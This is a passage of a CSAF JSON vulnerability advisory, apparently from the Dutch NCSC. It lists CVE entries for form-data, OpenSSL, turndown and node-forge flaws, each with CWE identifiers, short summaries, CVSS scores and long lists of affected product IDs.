"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-6965"
},
{
"cve": "CVE-2025-7783",
"cwe": {
"id": "CWE-330",
"name": "Use of Insufficiently Random Values"
},
"notes": [
{
"category": "other",
"text": "Use of Insufficiently Random Values",
"title": "CWE-330"
},
{
"category": "description",
"text": "The form-data library\u0027s use of predictable random number generation for boundary values poses security risks, while vulnerabilities in HPE products allow for Remote Code Execution and Local Authentication Bypass.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-7783 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-7783.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-7783"
},
{
"cve": "CVE-2025-9230",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Read",
"title": "CWE-125"
},
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
},
{
"category": "description",
"text": "Multiple OpenSSL versions have an out-of-bounds read/write vulnerability in RFC 3211 KEK unwrap related to password-based CMS decryption, with moderate severity due to low exploit likelihood, affecting products including NetApp, Oracle, and SAP components.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-9230 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-9230.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-9230"
},
{
"cve": "CVE-2025-9232",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Read",
"title": "CWE-125"
},
{
"category": "description",
"text": "A low-severity out-of-bounds read vulnerability in OpenSSL HTTP client API occurs when the \u0027no_proxy\u0027 environment variable is set and the HTTP URL contains an IPv6 address, causing denial of service via application crash in multiple products including Oracle PeopleSoft and NetApp devices.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-9232 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-9232.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-9232"
},
{
"cve": "CVE-2025-9670",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"notes": [
{
"category": "other",
"text": "Inefficient Regular Expression Complexity",
"title": "CWE-1333"
},
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "description",
"text": "A security vulnerability in mixmark-io turndown up to version 7.2.1 allows remote attackers to exploit inefficient regular expression complexity in src/commonmark-rules.js, with a public exploit available.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-9670 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-9670.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-9670"
},
{
"cve": "CVE-2025-12816",
"cwe": {
"id": "CWE-436",
"name": "Interpretation Conflict"
},
"notes": [
{
"category": "other",
"text": "Interpretation Conflict",
"title": "CWE-436"
},
{
"category": "other",
"text": "Incorrect Behavior Order: Early Validation",
"title": "CWE-179"
},
{
"category": "description",
"text": "This update addresses multiple golang exporter upgrades, fixes critical CVE-2025-12816 in Prometheus related to ASN.1 validation bypass in node-forge \u22641.3.1, and includes various bug fixes and optimizations across components like grafana, spacecmd, and uyuni-tools.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
